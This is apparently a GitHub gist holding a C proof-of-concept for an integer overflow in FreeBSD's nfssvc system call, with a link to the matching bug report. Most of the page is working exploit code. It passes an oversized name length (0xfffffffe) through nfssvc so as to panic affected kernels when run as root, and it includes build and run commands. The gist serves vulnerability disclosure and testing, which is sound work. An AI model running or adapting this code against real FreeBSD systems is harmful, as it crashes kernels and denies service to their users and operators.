Skip to content

Instantly share code, notes, and snippets.

@CTurt CTurt/nfssvc.c
Last active Apr 13, 2016

Embed
What would you like to do?
FreeBSD nfssvc system call integer overflow
/*
PoC for FreeBSD kernel integer overflow in nfssvc system call
Refer to bug report here: https://bugs.freebsd.org/bugzilla/show_bug.cgi?id=206626
System call only accessible as root.
Running this test will panic affected versions of FreeBSD.
clang nfssvc.c -o n
su
./n
- CTurt
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <errno.h>
#include <sys/param.h>
#include <sys/mount.h>
#include <sys/time.h>
#include <nfsserver/nfs.h>
#include <unistd.h>
#define NFSID_INITIALIZE 0x0001
#define NFSSVC_IDNAME 0x00000200
#define NFSSVC_NEWSTRUCT 0x20000000
struct nfsd_idargs {
int nid_flag; /* Flags (see below) */
uid_t nid_uid; /* user/group id */
gid_t nid_gid;
int nid_usermax; /* Upper bound on user name cache */
int nid_usertimeout;/* User name timeout (minutes) */
u_char *nid_name; /* Name */
int nid_namelen; /* and its length */
gid_t *nid_grps; /* and the list */
int nid_ngroup; /* Size of groups list */
};
int main(void) {
u_char *overflow = malloc(0x4000);
memset(overflow, 'a', 0x4000);
struct nfsd_idargs nid;
nid.nid_flag = NFSID_INITIALIZE;
nid.nid_name = overflow;
nid.nid_namelen = 0xfffffffe;
printf("Triggering...\n");
int result = nfssvc(NFSSVC_IDNAME | NFSSVC_NEWSTRUCT, &nid);
printf("Result: %d\n", result);
printf("Errno: %d\n", errno);
free(overflow);
return 0;
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.